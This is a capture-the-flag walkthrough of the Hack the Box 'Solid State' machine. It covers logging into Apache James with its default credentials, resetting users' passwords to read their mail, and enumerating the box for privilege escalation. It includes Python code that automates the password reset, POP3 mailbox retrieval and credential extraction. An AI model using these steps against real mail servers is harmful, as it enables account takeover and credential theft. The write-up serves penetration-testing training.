Hack the Box: Solid State Walkthrough

Welcome to another Hack the Box walkthrough. Today, we’ll be talking about the newly retired Solid State machine. This was one of the first ones that I was able to do on my own without hints while working on the OSCP, so it’s one that I hold near and dear to my heart. Anyway, enough blabbing, let’s get hacking.

Reconnaissance

The first thing we need to do with any new host is scan it and learn what services are running on the machine. Let's start with a quick nmap scan of the top 100 ports. With this, we see:

OK, so a few things look interesting: some web ports, some mail ports, and SSH. It always interests me when several services share a product name; one product exposing multiple listeners often presents a nice attack surface. A quick Google search turns up something that catches our attention:

Google search for Apache JAMES server exploits

Well, that's nice: the version matches what we found on the server, so let's dig into this more. Reading the exploit, we see that it's an authenticated command execution vulnerability, which is still worth knowing about in case we can get hold of the credentials it needs. By default it connects to the target's remote administration service on port 4555 with the default credentials of root for both the username and the password, and as seen below, those work here:

Interesting. We can log in, and there are a few users on the server, so at the very least the exploit can be sent; whether we can get it to trigger is a different story. The easiest way to see whether any of these users has email of interest is to reset their passwords from the administration console and then log in to their mailboxes. Keep in mind that this is destructive (the real owner loses access to the mailbox), so it's the kind of change to record in your notes. Let's do that and see what they have to say:
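The console and mailbox exchange just described, as an added example that is not code from the original post: it logs in to the James remote administration service, lists the users, resets one password, then pulls the mailbox over POP3 and extracts a credential pair from the message body. The server replies are a constructed transcript shaped like James's output, and the passwords and mail content are placeholders; to run it against a real host, pass `sock.makefile("rwb")` of a connected socket in place of a `ScriptedPeer`.

```python
"""Reset a mailbox password via the Apache James remote admin service (TCP 4555), then
read the mailbox over POP3 (TCP 110) and pull credentials out of it. Added example, not
code from the original post: server replies are a constructed transcript shaped like
James's output, and passwords and mail content are placeholders. For a real host, pass
sock.makefile("rwb") of a connected socket instead of a ScriptedPeer."""
import re

class ScriptedPeer:
    """Constructed stand-in for a socket file: replays canned server lines, records sends."""
    def __init__(self, server_lines):
        self._lines, self.sent = list(server_lines), []
    def readline(self):
        return self._lines.pop(0) if self._lines else b""
    def write(self, data):
        self.sent.append(data)
    def flush(self):
        pass

def send_line(peer, line):
    peer.write(line + b"\r\n")
    peer.flush()

def james_login(peer, user=b"root", password=b"root"):
    for _ in range(3):  # banner, 'Please enter your login and password', 'Login id:'
        peer.readline()
    send_line(peer, user)
    peer.readline()  # 'Password:'
    send_line(peer, password)
    if not peer.readline().startswith(b"Welcome"):  # 'Welcome root. HELP for a list of commands'
        raise RuntimeError("admin login failed")

def james_list_users(peer):
    """'listusers' answers 'Existing accounts N' followed by N lines of 'user: name'."""
    send_line(peer, b"listusers")
    m = re.match(rb"Existing accounts (\d+)", peer.readline())
    if not m:
        raise RuntimeError("unexpected listusers reply")
    return [peer.readline()[len(b"user: "):].strip().decode() for _ in range(int(m.group(1)))]

def james_set_password(peer, user, new_password):
    """'setpassword <user> <pw>' answers 'Password for <user> reset'. This locks the
    real owner out, so note the change for the report."""
    send_line(peer, b"setpassword " + user + b" " + new_password)
    return peer.readline().startswith(b"Password for")

def pop3_ok(peer):
    line = peer.readline()
    if not line.startswith(b"+OK"):
        raise RuntimeError("POP3 error: %r" % line)
    return line

def pop3_multiline(peer):
    """Read up to the lone '.' terminator, undoing RFC 1939 byte-stuffing ('..' -> '.')."""
    out = []
    while True:
        line = peer.readline()
        if not line:
            raise RuntimeError("connection closed before the terminator")
        if line.rstrip(b"\r\n") == b".":
            return b"".join(out)
        out.append(line[1:] if line.startswith(b"..") else line)

def pop3_fetch_all(peer, user, password):
    pop3_ok(peer)  # banner
    for cmd in (b"USER " + user, b"PASS " + password, b"LIST"):
        send_line(peer, cmd)
        pop3_ok(peer)
    ids = [int(l.split()[0]) for l in pop3_multiline(peer).splitlines() if l.strip()]
    messages = {}
    for i in ids:
        send_line(peer, b"RETR %d" % i)
        pop3_ok(peer)
        messages[i] = pop3_multiline(peer)
    return messages

def extract_credentials(message):
    """Pull a 'username: x ... password: y' pair out of a message body."""
    m = re.search(rb"username:\s*(\S+).*?password:\s*(\S+)", message, re.S | re.I)
    return (m.group(1).decode(), m.group(2).decode()) if m else None

ADMIN_TRANSCRIPT = [  # constructed
    b"JAMES Remote Administration Tool\r\n", b"Please enter your login and password\r\n",
    b"Login id:\r\n", b"Password:\r\n", b"Welcome root. HELP for a list of commands\r\n",
    b"Existing accounts 3\r\n", b"user: james\r\n", b"user: thomas\r\n", b"user: mindy\r\n",
    b"Password for mindy reset\r\n"]
POP3_TRANSCRIPT = [  # constructed: one message carrying placeholder credentials
    b"+OK solidstate POP3 server ready\r\n", b"+OK\r\n", b"+OK Welcome mindy\r\n",
    b"+OK 1 180\r\n", b"1 180\r\n", b".\r\n", b"+OK Message follows\r\n",
    b"From: mailadmin@localhost\r\n", b"Subject: Your access details\r\n", b"\r\n",
    b"username: mindy\r\n", b"password: Placeholder-Pass-123\r\n",
    b"..this body line began with a dot, so the server byte-stuffed it\r\n", b".\r\n"]

def demo():
    admin = ScriptedPeer(ADMIN_TRANSCRIPT)
    james_login(admin)
    users = james_list_users(admin)
    reset = james_set_password(admin, b"mindy", b"NewPass1")
    mail = ScriptedPeer(POP3_TRANSCRIPT)
    messages = pop3_fetch_all(mail, b"mindy", b"NewPass1")
    return {"users": users, "reset": reset, "messages": messages, "admin_sent": admin.sent,
            "creds": extract_credentials(messages[1])}
```

The byte-stuffed line in the constructed mailbox is there on purpose: a POP3 client that does not undo the stuffing will hand you a body with a spurious leading dot, and one that does not watch for the lone `.` terminator will hang waiting for more data.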

Wonderful. Now we have credentials. Let's see if they work on SSH. Maybe we don't need an exploit!

root@kali:~/Pentest/10.51-solidstate/02-exploitation/02-success# ssh mindy@10.10.10.51
The authenticity of host '10.10.10.51 (10.10.10.51)' can't be established.
ECDSA key fingerprint is SHA256:njQxYC21MJdcSfcgKOpfTedDAXx50SYVGPCfChsGwI0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.51' (ECDSA) to the list of known hosts.
mindy@10.10.10.51's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan 16 00:55:41 2018 from 10.10.14.15
mindy@solidstate:~$ echo $0
-rbash

OK, it looks like we're in rbash, a restricted shell (no cd, no changing PATH, no output redirection, no command names containing slashes), so we'll need to use the exploit after all. Let's give that a try.

Exploitation

OK, so we have credentials that work over SSH and an exploit. Let's retrieve https://www.exploit-db.com/exploits/35513/ and adapt it for our use.

The stock payload doesn't help us: for one, we may not be root when it runs, and if we are, we want a shell. So we want a different payload. Let's use msfvenom to build a new one; the following command should work for us:

With a real shell in hand, we can start enumerating the box for privilege escalation. There is a lot here to review, but a couple of things jump out. First, the root user is allowed to log in over SSH (PermitRootLogin), which has potential to be interesting for sure. Second, there is a world-writable file owned by root. Maybe we can use this.
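Two of those checks, as an added example that is not the post's enumeration output or tooling: the effective PermitRootLogin value from an sshd_config (sshd uses the first value it sees for a keyword, and settings under a Match block apply only to matching connections) and a walk for world-writable regular files owned by a given uid. The directory tree and config text are constructed for the run; the owner filter defaults to root but the demo uses the current user so it works without root.

```python
"""Two post-exploitation checks from the enumeration above, runnable offline against a
constructed directory tree and sshd_config text. Added example, not the post's own
enumeration output or tooling."""
import os
import stat
import tempfile

def permit_root_login(sshd_config_text, default="prohibit-password"):
    """Effective PermitRootLogin. sshd keeps the FIRST value it reads for a keyword, so a
    later 'no' does not override an earlier 'yes'. Directives after a Match line apply
    only to matching connections, so the global value is settled before it. The default
    is OpenSSH's compiled-in one (prohibit-password since 7.0)."""
    for raw in sshd_config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.replace("=", " ", 1).split(None, 1)
        keyword = parts[0].lower()
        if keyword == "match":
            break
        if keyword == "permitrootlogin" and len(parts) == 2:
            return parts[1].strip().lower()
    return default

def world_writable_files(top, owner_uid=0):
    """Regular files under `top` with the other-write bit set and owned by owner_uid,
    like `find / -type f -perm -o+w -user root 2>/dev/null`. lstat is used so a symlink
    pointing at a writable file is not reported as if the link itself were the target."""
    hits = []
    for dirpath, _, names in os.walk(top):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:  # vanished or unreadable; keep walking
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IWOTH and st.st_uid == owner_uid:
                hits.append(path)
    return sorted(hits)

def demo():
    """Constructed tree: one 0666 file, one 0644 file and a symlink, all owned by the
    current user, so the owner filter is exercised without needing root."""
    top = tempfile.mkdtemp()
    tools = os.path.join(top, "opt", "tools")
    os.makedirs(tools)
    for name, mode in (("cleanup.sh", 0o666), ("README", 0o644)):
        path = os.path.join(tools, name)
        with open(path, "w") as fh:
            fh.write("# placeholder content\n")
        os.chmod(path, mode)
    os.symlink(os.path.join(tools, "cleanup.sh"), os.path.join(top, "link-to-cleanup"))
    config = ("# PermitRootLogin prohibit-password   <- commented out, ignored\n"
              "PermitRootLogin yes\n"
              "Match User mindy\n"
              "    PermitRootLogin no\n")
    return {"writable": [os.path.relpath(p, top) for p in world_writable_files(top, os.getuid())],
            "permit_root_login": permit_root_login(config)}
```

A world-writable file owned by root is only interesting if something privileged actually runs or reads it, so the next step after finding one is to check cron, systemd timers and init scripts for references to it.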

Author: Kevin Kirsche

Kevin is a Principal Security Architect with Verizon. He holds the OSCP, OSWP, OSCE, and SLAE certifications. He is interested in learning more about building exploits and advanced penetration testing concepts.